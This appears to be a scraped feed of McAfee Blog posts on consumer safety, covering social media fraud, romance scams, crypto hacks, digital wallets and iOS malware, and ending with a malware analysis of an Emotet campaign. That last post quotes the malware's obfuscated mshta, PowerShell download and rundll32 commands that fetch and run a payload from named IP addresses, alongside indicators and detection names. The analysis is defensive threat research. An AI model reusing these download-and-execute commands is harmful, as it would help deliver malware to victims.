Login
It’s fun to jump on our favorite social media sites such as Facebook, Instagram, or LinkedIn and know we can quickly check in with friends and family, discover interesting content, and instantly connect with colleagues worldwide. The last thing on most of our minds when tapping our way into these familiar online communities is being the target of cybercrime.
But it’s happening more and more.
Last month, The Federal Trade Commission (FTC) described popular social media sites as “goldmines” for malicious attacks. The FTC revealed that more than one in four people who reported losing money to fraud in 2021 said it started on social media with an ad, a post, or a message. More than 95,000 people reported about $770 million in losses to fraud initiated on social media platforms in 2021. According to the FTC, those losses account for about 25 percent of all reported losses to fraud in 2021 and represent a stunning eighteenfold increase over 2017 reported losses.
The social environment is a magnet for bad actors because people of every age and country flock there each day. The constant flow of conversation and content—and more importantly, the climate of trust—makes social networks juicy targets for cybercrime.
The biggest motivation? The emerging digital security threat of cryptojacking (aka illegal cryptomining). Cryptojacking is illegally accessing another person’s computer power to mine cryptocurrency. Cybercriminals do this by getting a victim to click on a malicious link delivered via direct message, a news story, or an ad. Once clicked, that link loads crypto mining code on the victim’s computer or leads them to an infected website or online ad with JavaScript code that auto-executes once it’s loaded in the victim’s browser. Often the malware goes undetected, and the only way a victim might know their system has been compromised is that it may start performing more slowly.
While bad actors use social media platforms to distribute cryptomining malware, they also spread other malware types such as advertisements, faulty plug-ins, and apps that draw users in by offering “too good to be true” deals. Once clicked on, the malware allows cybercriminals to access data, create keyloggers, release ransomware, and monitor social media accounts for future scamming opportunities.
Be sure your kids understand the risks and responsibilities associated with device ownership. Consider putting time aside each week to discuss crucial digital literacy topics and ongoing threats such as cryptomining malware. Consider a “device check-in” that requires each person in your family to “check off” the following security guidelines.
To help protect your family devices from viruses, malware, spyware, and other digital threats entering social media sites, consider adding extra security to your family devices with McAfee Total Protection.
Avoid posting home addresses, full birth dates, employer information, school information, as well as exact location details of where you are.
Install software updates so that attackers cannot take advantage of the latest security loopholes.
Select passwords that will be difficult for bad actors to guess and use different passwords for different programs and devices.
For a virus to solve cryptographic calculations required to mine cryptocurrency requires an enormous amount of computer processing power (CPUs). Cryptojacking secretly consumes a victim’s processing power, battery life, and computer or device memory. Look out for a decline in device processing speed.
Be careful when accepting friend requests, direct messages, or clicking on links sent by someone you don’t know personally. This is one of the most popular ways cybercriminals gain access.
Be discerning even when a known friend sends you a second friend request claiming they’ve been hacked. Search known names on the platform for multiple accounts. Cybercriminals have been known to gather personal details of individuals, pose as that person, then connect with friend lists using familiar information to build trust with more potential victims.
Be sure to report any fraudulent activity you encounter on social platforms to help stop the threat from spreading to other accounts, including friends and family who may be connected back to you.
New scams and more sophisticated ways to steal data—and computer processing power for illegal cryptomining—surface daily. Staying in front of those threats and folding them into your family dynamic is one of the most powerful ways to give your kids the skills and security habits they will need to thrive in today’s digital world.
The post Social Media: How to Steer Your Family Clear of Cryptomining Malware appeared first on McAfee Blog.
Cryptocurrency has boomed in the last several years, with beginners and experts alike jumping into the industry. It’s proven now to be more than a passing hobby or trend. Cryptocurrency is a way of conducting business and making money for people around the world.
As the intrigue and interaction with crypto grows, cybercriminals are finding new ways to exploit the system. According to CNBC, a recent crypto hack resulted in the loss of over $320 million across two major blockchain networks. Here’s what you need to know about this latest breach, plus some tips on how you can protect your crypto assets.
There’s more than one kind of cryptocurrency, and many users spread out their investments across various currencies and blockchain ecosystems. To link their activities, some crypto users employ a type of bridging software that can easily connect their different accounts. Wormhole is a popular bridge that allows users to freely move their tokens and NFTs between the Solana and Ethereum blockchains.
In this recent crypto hack, a cybercriminal installed a bug that minted 120,000 fake currency on the Solana side of the Wormhole bridge. Then, the criminal transferred 120,000 counterfeit currency to the Ethereum side to claim Ethereum tokens. This resulted in the hacker gaining at least $251 million worth of Ethereum, nearly $47 million in Solana, and upwards of $4 million in USDC, a third type of cryptocurrency.
The Wormhole team offered the hacker $10 million to return the stolen currency and explain how they executed the hack. Wormhole has since tweeted that they’ve restored all stolen funds and that the system is now back to normal. Experts think they have successfully reverse-engineered the exploit and suspect that the attacker gained access through bypassing the verify signature process.
As cryptocurrencies continue to take the world by storm, it’s key that users learn how to engage with this emerging industry safely. Even though the Wormhole breach affected the crypto platforms and not individual users, this incident is a reminder to be diligent about your crypto safety. Check out these tips to help you protect your crypto investments:
Like with any process that involves investing your own, hard-earned money, you should be diligent about researching every cryptocurrency, blockchain, and accompanying software you use. Never trust your money to a product or service that you’re not completely confident in their security protocols. Keep up with national and world news and crypto-specific news outlets to stay on top of the latest security breaches and to gather tips on which system may be the safest option for you. When jumping into cryptocurrency, make sure that any benefits outweigh the risks.
As with all your online accounts, protect your cryptocurrency logins with secure, unique passwords and two-factor authentication. Never reuse passwords, since it’s possible for wily cybercriminals to buy lists of login and password combinations on the dark web. Two-factor authentication often makes it impossible for anyone to break into your account, as it requires a randomly generated passcode for entry. Passcodes are often sent by text or through a smartphone application. Sometimes it’s difficult to remember all your passwords, so consider trusting them to a password manager, such as McAfee True Key. An online account locked behind a secure password and two-factor authentication will likely frustrate a cybercriminal and cause them to move along, keeping your account safe.
Add an extra layer of protection to your crypto assets with a hardware wallet. A hardware wallet stores private keys that are necessary to unlock your blockchain accounts. This device is compatible with various blockchains and helps back up and protect your investments, even if your device is compromised by malware or a phishing attack. Hardware wallets are often protected by PINs and a passphrase, so even if the device is lost or stolen, you can feel confident in the safety of your crypto accounts.
Make it part of your weekly routine to check in on your crypto account to ensure that there are no suspicious transactions. Keep the pulse on the news, so that whenever there’s a breach, you can make a timely report of any losses you may have experienced. Also, consider changing your login credentials to be on the safe side.
The only way to enjoy your cryptocurrency experience is to be confident in it. While the Wormhole loophole was almost impossible for a casual everyday user to predict, as long as you have a contingency plan and safeguards in place, you can be confident in your crypto activities.
The post Latest Crypto Vulnerability Leaks $320 Million: 3 Tips to Boost Your Crypto Confidence appeared first on McAfee Blog.
There are very few guarantees in this world – but experiencing drama when you are a parent is a sure thing! And as a mum of 4, I’ve had my fair share. Whether it’s friendship issues, homework problems or just picking up the pieces after some bad choices – I feel like my job as a mother is most tested when I’m helping my boys navigate the tough stuff.
But after clocking up 25 years of parenting, I’ve learned one thing – when you’re in the thick of issues with your kids, being calm (even on the outside) is the best way of getting to the bottom of an issue, and helping them solve it.
Even though we may compartmentalize our lives into offline and online, our kids don’t. For them, it’s the same thing! They use their online life to set up their online activities. In fact, their online life is a critical element of their day-to-day lives. So, if a problem arises online – an embarrassing photo is shared or they make a wrong move – it can feel like their whole world is affected.
I don’t know how many times I’ve wanted to scream this from my lungs when my boys have found themselves in tricky online situations over the years. And I am sure I am not alone. When our kids come to us with an online issue, all we want to do is throw the router in the bin or cancel their phone plan. But, that, my friends, is the worst think you can do. If your kids think there is even a small chance you’ll remove their technology, then I promise you that they will never come to you with an online issue. They would much rather try and work it out themselves than threaten disconnection because their online world is their entire world.
Without a doubt, THE most important thing you can do for your kids is to guarantee that you will NOT scream, shout or disconnect them from their devices if they come to you with a problem. Even though you know it will be tough, promising them that you will remain calm will mean they are far more likely to seek your advice when things are tough. Of course, I am not suggesting that you don’t deal out punishments or introduce new rules as a result of the issue but remaining approachable is key.
Being a teenager in this digital era is completely different from the 70’s, 80’s and 90’s. So, while some of the issues your kids may experience may mirror yours, many will not. Thankfully, we didn’t have the constant pressure that social media can be when we were growing up. Some kids can rationalize the way social media works and not lose any sleep over it whereas others will find it much trickier to navigate.
So, take a minute to really understand their social media-dominated world. Many kids, understandably, struggle when comparing themselves to someone’s perfectly curated Instagram feed; feel lonely or ‘less than’ when discovering that their friends are all out (thanks to a shared pic online) but they weren’t invited; or, consumed by the number of likes their posts achieve. As the great Atticus Finch in ‘To Kill A Mockingbird’ said ‘You never really understand a person until you consider things from his point of view … until you climb into his skin and walk around in it.” So, try as hard as you can to understand how these pressures can affect their mindset.
When things are tricky and overwhelming, making a plan can help direct the angst and reduce the worry. Depending on the issue your child is having online, you may want to introduce some new rules around the time and place they can use their device. For example, if devices were not yet banned from the bedroom – this could be a good place to start. You could also insist devices are placed in a ‘charging zone’ on the kitchen bench overnight so their bedroom becomes a tech-free zone.
Additionally, if you are worried your child is experiencing concerning levels of anxiety or low mood as a result of the situation, you might want to include making an appointment with the counselor at school or an independent psychologist. Also, notifying the school may also be a helpful action point for the plan too – depending again on the nature of the issue.
If I’m being honest, being calm and chilled is probably not my natural state. I could blame it on genetics or maybe the amount of caffeine I consume but when it comes to my helping my boy with the tricky stuff, I dig deep. I channel my inner yogi and muster up all the patience and chilled vibes I can because it’s so worth it. Knowing my boys understand they can come to me about any problem – online or offline – means they know someone always has their back. And isn’t that our job as parents?
Till next time
Alex xx
The post Why Staying Calm May Be One Of The Best Ways Of Keeping Your Kids Safe Online appeared first on McAfee Blog.
There’s millions of dollars to be made in social media. For scammers.
New data from the U.S. Federal Trade Commission (FTC) suggests that Americans lost nearly three-quarters of a billion dollars to social media fraud in 2021, signaling that social media may be the most profitable method of scamming victims—marking an 18-fold increase over 2017.
And that’s just cases of reported fraud.
Of the roughly 95,000 cases tallied in 2021, the actual number of reports and losses are arguably much higher because fraud victims infrequently report these crimes to the FTC or other agencies. Likewise, few take advantage of the FTC’s resources for recovering from fraud. Instead, they’ll share the sad news with family or friends if anyone at all.
Despite the rise of these online crimes, there are several things you can do to increase your awareness of social media fraud—what it looks like and how it’s pulled off—along with other ways you can prevent scammers from targeting you and the ones you care about.
Several types of social media fraud abound, yet the FTC reports that three types of scams prevail:
These often involve bogus sites that promote opportunities to mine or invest in cryptocurrencies. Rather than use these sites to trade in legitimate cryptocurrencies, scammers use these as a front to collect funds. The funds are never invested and never returned. Thanks to social media, scammers have a quick and easy way to drive victims to such bogus sites.
By starting up a chat through an unexpected friend request or a message that comes out of the blue, a scammer develops a budding romantic relationship with a victim—and eventually starts asking for money. Public social media profiles are particularly attractive to scammers because they’re loaded with information that scammers can use to win a victim’s confidence or heart.
Using ads on social media, scammers drive victims to phony online stores that will take people’s money but that don’t deliver the goods. They’re simply a way for scammers to harvest cash from unsuspecting shoppers. These sites may impersonate reputable brands and stores or they may sell bogus products altogether. Either way, victims pay and receive nothing in return.
Together, these three types of scams accounted for the overwhelming majority of losses and reports of social media fraud, which are broken down in detail as follows:
As illustrated, investment and romance scams may get reported less frequently, yet they are among the costliest scams going on social media. Meanwhile, online shopping scams on social media are far more common yet rake in fewer dollars overall.
For one, reach. Nearly half of the global population uses social media today. That translates into billions of people who can be made into potential victims. Secondly, social media provides the tools to reach those people through the otherwise legitimate services and features available to the people and businesses that use social media to connect.
In the case of investment and shopping scammers, the ad platforms are of particular use. For romance scammers, direct messaging and profile pages are potential avenues for fraud.
Scammers use the highly targeted ad platform that social media companies use to generate revenue. With millions of detailed user profiles in their data stores, social media companies put that data to work in their ad platforms allow businesses to create ads designed to reach specific age groups, hobbies and interests, past purchases, and so on. Just as easily, a scammer can use the same tools to cook up bogus ads for their bogus products, services, and sites at a relatively low cost.
For example, a scammer could target older females with an interest in investing. From there, the scammer could narrow down that target profile to those who live in areas of the country with a desired average income level, and who have shown interest in investment products before. The scammers would create an ad that takes them to phony website designed to entice that target group into purchasing a bogus product, service, or crypto. The FTC reports that the median loss for an online shopping scam in 2021 was $118, while online investment scams on social media racked up a median loss of $1,800 per victim. These stats make a strong case for sticking to reputable and established retailers and accredited financial services.
In the case of romance scammers on social media, the posts and personal profiles that form the heart of social media offer con artists a treasure trove. With a potential victim’s life a relatively open book, full of birthdays, events, interests, and activities for all to see, scammers have the hooks they need to form a phony romantic relationship online—or at least make the attempt at one.
For example, a scammer reaches out to a potential victim with a friend request. With the profile and posts this romance scammer has at hand, they can spin all manner of intriguing, yet utterly false tales designed to gain the victim’s trust. With that trust established, they can follow up with a similarly intriguing story about needing “a little help” to cover some “unexpected expenses,” often in the form of a gift card or reloadable debit card—sometimes stringing out a series of requests over time. According to the FTC, the median loss for this type of romance scam in 2021 was around $2,000 per victim.
People worldwide spend an average of 145 minutes a day on social media. And with users in the U.S. spending just over two hours on social media a day, that’s a great deal of potential exposure to scams.
Yet, whether you’re using Facebook, Instagram, TikTok, or whatnot, here are several things you can do that can help keep you safe and secure out there:
Passwords mark square one in your protection, with strong and unique passwords across all your accounts forming primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one.
Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy and give a possible scammer much less material to work with.
Be critical of the invitations you receive. Out-and-out strangers could be more than just a stranger, they could be a fake account designed to gather information on users for purposes of fraud. There are plenty of fake accounts too. In fact, in Q3 of 2021 alone, Facebook took action on 1.8 billion fake accounts. Reject such requests.
We’re increasingly accustomed to the warnings about phishing emails, yet phishing attacks happen plenty on social media. The same rules apply. Don’t follow any links you get from strangers by way of instant or direct messages. And keep your personal information close. Don’t pass out your email, address, or other info as well. Even those so-called “quiz” posts and websites can be ruses designed to steal bits and pieces of personal info that can be used as the basis of an attack.
When you’re purchasing online, do some quick research on the company. How long have they been around? Have any complaints been recorded by your attorney general or local consumer protection agency? When you meet someone new, do a reverse image search on their profile pic to see where else it appears. Look up their name in search as well. If the results you find don’t match up with the person’s story, it may be a sign of a scam.
Online protection software can protect you from clicking on malicious links while on social media while steering you clear of other threats like viruses, ransomware, and phishing attacks. It can look out for you as well, by protecting your privacy and monitoring your email, SSN, bank accounts, credit cards, and other personal information. With identity theft a rather commonplace occurrence today, security software is really a must. Additionally, our online protection software can also provide you with an online Protection Score that shows you just how safe you are. From there, it calls out any weak spots and then walks you through the steps to shore it up with personalized guidance.
It’s unfortunate seeing a resource we’ve come to know and love over the past years get taken advantage of this way. Yet taking the steps outlined above can go a long way to prevent it from happening to you or someone you love.
One important note is to strongly consider filing a report if you believe you’ve been a victim of a social media scam. While some of the scammers behind these crimes are small-time operators, there are larger, almost business-like operations that conduct these crimes on a broader and sometimes international scale. So whether filing a report will help you recover some or all your losses, it can provide information to businesses and agencies that can help keep it from happening to others.
For more on online theft and fraud, and how you can spot and report it, check out our article on the topic. Doing so may help you, and someone else as well.
The post The Gold Rush of Fraud: Why Scammers Have Flocked to Social Media appeared first on McAfee Blog.
For years now, the popularity of online dating has been on the rise—and so have the number of online romance scams that leave people with broken hearts and empty wallets.
According to the U.S. Federal Trade Commission (FTC), the reported costs of online romance scams jumped 50% from 2019 to 2020, to the tune of $304 million. And that’s not entirely because 2020 was a pandemic year. From 2016 to 2020, the volume of reported cases tripled, while reported losses nearly quadrupled. Over that period, online romance scams are not only becoming more common, but they’re also becoming more costly.
Dating and romance scams aren’t limited to online dating apps and sites, they’ll happen on social media and in online games as well. However, the FTC reports that the scam usually starts the same way, typically through an unexpected friend request or a message that comes out of the blue.
With that initial introduction made, a chat begins, and a friendship (or more) blossoms from there. Along the way, the scammer will often rely on a mix of somewhat exotic yet believable storytelling to lure the victim in, often involving their job and where they’re working. Reports say that scammers will talk of being workers on an offshore oil rig, members of the military stationed overseas, doctors working with an international organization, or working in the sort of jobs that would prevent them from otherwise easily meeting up in person.
With the phony relationship established, the scammer starts asking for money. The FTC reports that they’ll ask for money for several bogus reasons, usually revolving around some sort of hardship where they need a “little help” so that they can pay:
The list goes on, yet that’s the general gist. Scammers often employ a story with an intriguing complication that seems just reasonable enough, one where the romance scammer makes it sound like they could really use the victim’s financial help.
People who have filed fraud reports say they’ve paid their scammer in a few typical ways.
One is by wiring money, often through a wire transfer company. The benefit of this route, for the scammer anyway, is that this is as good as forking over cash. Once it’s gone, it’s gone. The victim lacks the protections they have with other payment forms, such as a credit card that allows the holder to cancel or contest a charge.
Another way is through gift cards. Scammers of all stripes, not just romance scammers, like these because they effectively work like cash, whether it’s a gift card for a major online retailer or a chain of brick-and-mortar stores. Like a wire transfer, once that gift card is handed over, the money on it is highly difficult to recover, if at all.
One more common payment is through reloadable debit cards. A scammer may make an initial request for such a card and then make several follow-on requests to load it up again.
In all, a romance scammer will typically look for the easiest payment method that’s the most difficult to contest or reimburse, leaving the victim in a financial lurch once the scam ends.
When it comes to meeting new people online, the FTC suggests the following:
Scammers, although arguably heartless, are still human. They make mistakes. The stories they concoct are just that. Stories. They may jumble their details, get their times and dates all wrong, or simply get caught in an apparent lie. Also, keep in mind that some scammers may be working with several victims at once, which is yet another opportunity for them to get confused and slip up.
As mentioned above, some romance scammers troll social media and reach out through a direct message or friend request. With that, there are three things you can do to cut down your chances of getting caught up with a scammer:
Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy and give a romance scammer less information to exploit.
Be critical of the invitations you receive. Out-and-out strangers could be more than a romance scammer, they could be a fake account designed to gather information on users for purposes of cybercrime, or they can be an account designed to spread false information. There are plenty of them too. In fact, in Q3 of 2021 alone, Facebook took action on 1.8 billion fake accounts. Reject such requests.
Security software can protect you from clicking on malicious links that a scammer may send you online, while also steering you clear of other threats like viruses, ransomware, and phishing attacks in general. It can look out for your personal information as well, by protecting your privacy and monitoring your email, SSN, bank accounts, credit cards, and other info that a scammer or identity thief may put to use. With identity theft a rather commonplace occurrence today, security software is really a must.
If you suspect that you’re being scammed, put an end to the relationship and report it, as difficult as that may feel.
Notify the FTC at ReportFraud.ftc.gov for support and next steps to help you recover financially as much as possible. Likewise, notify the social media site, app, or service where the scam occurred as well. In some cases, you may want to file a police report, which we cover in our broader article on identity theft and fraud.
If you sent funds via a gift card, the FTC suggests filing a claim with the company as soon as possible. They offer further advice on filing a claim here, along with a list of contact numbers for gift card brands that scammers commonly use.
Lastly, go easy on yourself. If you find yourself a victim of online dating or romance fraud, know that you won’t be the first or last person to be taken advantage of this way. By reporting your case, you in fact may help others from falling victim too.
The post Phony Valentines: Online Dating Scams and How to Spot Them appeared first on McAfee Blog.
The convenience of tapping your phone at the cash register instead of fumbling for loose change in your physical wallet is undeniable. Nearly 40% of Canadians used their mobile wallets more often in 2020 because of the perceived safety of contactless payment, according to one report.1 While digital wallets and tap to pay is becoming more widespread, you may wonder: what exactly is a digital wallet? Are they safe?
A digital wallet, also known as a mobile wallet, is a smartphone app that stores your payment information and enables tap to pay at most point-of-sale terminals. A digital wallet is perfectly safe, as long as you guard your smartphone just as closely as you would your physical wallet.
Here’s why you should secure your digital wallet and three tips to help you do so.
Think about what you store in your physical wallet: credit cards, debit cards, driver’s license, library cards, gift cards, cash. Now, imagine (or if you’ve been unlucky enough to lose your wallet in the past, think back to) the hassle that would ensue if someone stole your wallet or you misplaced it. Not only do you have to cancel your cards, notify your various banks, and wait for replacements, but the niggling worry that a stranger has access to your personally identifiable information (PII) will likely keep you up at night.
Just like you store your wallet in your front pocket when about town and check your seat before leaving a taxi or a plane, look after your smartphone just as closely. Unlike a physical wallet, whose absence is noticed quickly, a digital wallet may be compromised by a cyber pickpocket without you knowing for a while. For example, the BBC reported that researchers found a potential shortcoming in Apple Pay’s Express Transit mode where cyber pickpockets could remotely access mobile wallets.2 Luckily, the researchers’ experiment is unlikely to occur in the real world, but it’s a reminder to everyone to check their monthly bank statements for suspicious transactions. Cybercriminals get smarter and bolder by the day, so it’s not unlikely that they’ll find and exploit a digital wallet shortcoming in the future.
Follow these tips to help you use your digital wallet more confidently.
Always protect your digital wallet with a passcode! This is the best and easiest way to deter cybercriminals. It’s best if this combination of numbers is different than the passcode to your phone. Also, make sure the numbers are random. Birthdays, anniversaries, house addresses, and the last digits of your phone number are all popular combinations and are crackable codes to a resourceful criminal.
Better yet, if your mobile wallet app allows you to protect your account with facial recognition or a fingerprint scan, set it up! If your digital wallet proves difficult or impossible to enter, a cybercriminal may leave it for an easier target, keeping your PII safe.
Another way to secure your digital wallet is to make sure you always download the latest software updates. Developers are constantly finding and patching security holes, so the most up-to-date software is often the most secure. Turn on automatic updates to ensure you never miss a new release.
Before you swap your plastic cards for digital payment methods, make sure you research the digital banking app before downloading. Make sure that any app you download is through the official Apple or Android store or the financial institution’s official website. Then, check out how many downloads and reviews the app has to make sure you’re downloading an official app and not an imposter. While most of the apps on official stores are legitimate, it’s always best practice to check for typos, blurry logos, and unprofessional app descriptions to make sure.
The digital era is an exciting time to make the most of the conveniences technology affords; however, constant vigilance is key to keeping your finances and PII private. Whether you’re looking for additional peace of mind or have lost your wallet, consider signing up for an identity monitoring service like McAfee identity protection. McAfee will monitor your email addresses and bank accounts and alert you to suspicious activities up to 10 months sooner than similar services. Are you curious about how secure your current online habits are? Check your Security Protection Score today and see what steps you can take to live more confidently online.
1Canadian Payment Methods and Trends Report 2021
The post How to Secure Your Digital Wallet appeared first on McAfee Blog.
Let’s face it – we would not be the same people we are today if it wasn’t for the internet. The internet has opened our eyes to so much information that we are privileged to have right at our fingertips. However, it’s important to remember that with so many individuals with access to the web, it can quickly become a place where rumors are spread, cyberattacks are cast, and misinformation arises. At McAfee, we are committed to protecting both you and your family. Together, through education and online protection, we can work together to experience a better internet for everyone. On this Safer Internet Day, here are our top 5 recommendations:
With a connected family, it’s important to pay attention to what your family members are connected to (IoT devices in the home, smartphones, tablets, etc.) and how they interact online. Maybe your son is an avid gamer, or your teenager is a social media mogul who enjoys tweeting and scrolling through TikTok. As a parent, you play a crucial role in setting an example for your children and loved ones. So, it’s important to teach them how to use the internet responsibly. Here are some tips for helping your family stay safe online:
In a time when students are reliant on connectivity to be successful in their education, it’s important that they connect to the internet safely. Ensuring a safe connection can prevent any security hiccups from standing in the way of you and your degree. If you are a college student, follow these tips to help you stay safe in a hybrid or distance learning environment:
Regardless of your industry, you are likely to rely on the internet to do your job. Restaurant workers use online POS systems, bank tellers require access to their customers’ online accounts – the list goes on. With so much of your day spent online, it’s important to keep internet safety best practices top of mind so you can continue to work free from potential cyber interruptions. No matter what career path you are on, following these tips can help you stay safe online and continue to do your job with confidence:
If you can dream it, you can stream it. With so much media at your fingertips, it’s important to remember that cybercriminals tend to focus their threats on trending consumer behaviors. For example, cybercriminals will tend to focus their scams on popular TV shows or movies in the hopes that an unsuspecting user will click on their malicious download. Because streaming has become so popular in recent years, consumers should prioritize the safety of their online streaming platforms like Spotify, Netflix, Hulu, etc. Here are some ways to stay protected while streaming:
As technology has become more advanced, we’ve become accustomed to the many benefits that come with taking our devices with us everywhere we go. For example, we can deposit checks from home with our mobile banking apps and can use vehicle location services on our phones to remind us where we parked. Here’s how you can stay protected while on-the-go:
“There’s no doubt the internet has brought so many benefits to our daily life,” says Alex Merton-McCann, McAfee’s Cyber Safety Ambassador. “I honestly can’t imagine life without it! But in order for us all to continue benefiting from its many pluses, we all have a responsibility to make it a safe and enjoyable place. So, let’s #playitfaironline and commit to being respectful and kind towards each other online to ensure life online is safe and enjoyable for us all!”
Check out #SaferInternetDay and #SID2022 hashtags on social media to be a part of the conversation.
The post How We Can All Work Together For a Better Internet appeared first on McAfee Blog.
Smartphones have become such an integral part of our lives that it’s hard to imagine a time when we didn’t have them. We carry so much of our lives on our devices, from our social media accounts and photos of our pets to our banking information and home addresses. Whether it be just for fun or for occupational purposes, so much of our time and attention is spent on our smartphones.
Because our mobile devices carry so much valuable information, it’s important that we stay educated on the latest cyber schemes so we can be prepared to combat them and keep our data safe. According to Bleeping Computer, researchers have developed a trojan proof of concept tool that fakes a shutdown or reboot of iPhones, preventing malware from being removed and allowing hackers to secretly snoop on microphones and cameras.
Let’s dive into the details of this technique.
Typically, when an iOS device is infected with malware, the solution is as simple as just restarting the device. However, with this new technique researchers are calling “NoReboot,” ridding a device of malware is not quite as simple.
“NoReboot” blocks the shutdown and reboot process from being carried out, preventing the device from actually restarting. Without a proper shutdown and reboot, a malware infection on an iOS device can continue to exist. Because the device appears to be shut off with a dark screen, muted notifications, and a lack of response, it is easy to assume that the device has shut down properly and the problem has been solved. However, the “NoReboot” technique has only simulated a reboot, allowing a hacker to access the device and its functions, such as its camera and microphone. If a hacker has access to these functions, they could record the user without their knowledge and potentially capture private information.
This attack is not one that Apple can fix, as it relies on human-level deception rather than exploiting flaws found on iOS. That’s why it’s important that we know how to use our devices safely and stay protected.
As previously mentioned, smartphone usage takes up a big chunk of our time and attention. Since we are so often on these devices, it is usually fairly easy to tell when something isn’t working quite like it is supposed to. While these things could very well just be technical issues, sometimes they are much more than that, such as malware being downloaded onto your smartphone.
Malware can eat up the system resources or conflict with other apps on your device, causing it to act oddly.
Some possible signs that your device has been hacked include:
A slower device, webpages taking way too long to load, or a battery that never keeps a charge are all things that can be attributed to a device reaching its retirement. However, these things may also be signs that malware has compromised your phone.
Malware running in the background of a device may burn extra computing power, causing your phone to feel hot and overheated. If your device is quick to heat up, it may be due to malicious activity.
If apps you haven’t downloaded suddenly appear on your screen, or if outgoing calls you don’t remember making pop up on your phone bill, that is a definite red flag and a potential sign that your device has been hacked.
Malware may also be the cause of odd or frequent pop-ups, as well as changes made to your home screen. If you are getting an influx of spammy ads or your app organization is suddenly out of order, there is a big possibility that your device has been hacked.
To avoid the hassle of having a hacked phone in the first place, here are some tips that may help.
Promptly updating your phone and apps is a primary way to keep your device safe. Updates often fix bugs and vulnerabilities that hackers rely on to download malware for their attacks.
Apple’s App Store and Google Play have protections in place to help ensure that apps being downloaded are safe. Third-party sites may not have those same protections or may even be purposely hosting malicious apps to scam users. Avoiding these sites altogether can prevent these apps from allowing hackers into your device.
Hackers may use public Wi-Fi to gain access to your device and the information you have inside of it. Using a VPN to ensure that your network is private and only you can access it is a great way to stay protected on the go.
Turning off your Wi-Fi and Bluetooth when you are not actively using them is a simple way to prevent skilled hackers from working their way into your devices.
Some hackers have been known to install malware into public charging stations and hack into devices while they are being charged. Investing in your own personal portable charging packs is an easy way to avoid this type of hack.
Encrypting your phone can protect your calls, messages, and information, while also protecting you from being hacked. iPhone users can check their encryption status by going into Touch ID & Passcode, scrolling to the bottom, and seeing if data protection is enabled.
Although researchers agree that you can never trust a device to be fully off, there are some techniques that can help you determine whether your device was rebooted correctly.2 If you do suspect that your phone was hacked or notice some suspicious activity, restart your device. To do this, press and hold the power button and either volume button until you are prompted to slide the button on the screen to power off. After the device shuts down and restarts, notice if you are prompted to enter your passcode to unlock the device. If not, this is an indicator that a fake reboot just occurred. If this happens, you can wait for the device to run out of battery, although researchers have not verified that this will completely remove the threat.
If you are worried that your device has been hacked, follow these steps:
The post How iOS Malware May Snoop on Our Devices appeared first on McAfee Blog.
Authored By: Kiran Raj
In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:
Hexadecimal format: 0xb907d607
Octal format: 0056.0151.0121.0114
Decimal format: 185.7.214.7
This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.
Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.
On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.
Below are the commands used in Hexadecimal and Octal variants of the Maldocs
| FORMAT | OBFUSCATED CMD | DEOBFUSCATED CMD |
| Hexadecimal | cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html | http://185[.]7[.]214[.]7/fer/fer.html |
| Octal | cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html | http://46[.]105[.]81[.]76/c.html |
On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.
The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code
The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.
| cmd line | (New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’) |
The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server
| cmd line | cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString |
| TYPE | VALUE | SCANNER | DETECTION NAME |
| XLS | 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c | McAfee LiveSafe and Total Protection | X97M/Downloader.nn |
| DLL | a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 | McAfee LiveSafe and Total Protection
|
Emotet-FSY |
| HTML URL | http://185[.]7[.]214[.]7/fer/fer.html
http://46[.]105[.]81[.]76/c.html |
WebAdvisor | Blocked |
| DLL URL | http://185[.]7[.]214[.]7/fer/fer.png
http://46[.]105[.]81[.]76/cc.png |
WebAdvisor | Blocked |
| TECHNIQUE ID | TACTIC | TECHNIQUE DETAILS | DESCRIPTION |
| T1566 | Initial access | Phishing attachment | Initial maldoc uses phishing strings to convince users to open the maldoc |
| T1204 | Execution | User Execution | Manual execution by user |
| T1071 | Command and Control | Standard Application Layer Protocol | Attempts to connect through HTTP |
| T1059 | Command and Scripting Interpreter | Starts CMD.EXE for commands execution | Excel uses cmd and PowerShell to execute command |
| T1218
|
Signed Binary Proxy Execution | Uses RUNDLL32.EXE and MSHTA.EXE to load library | rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript |
Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.
The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.
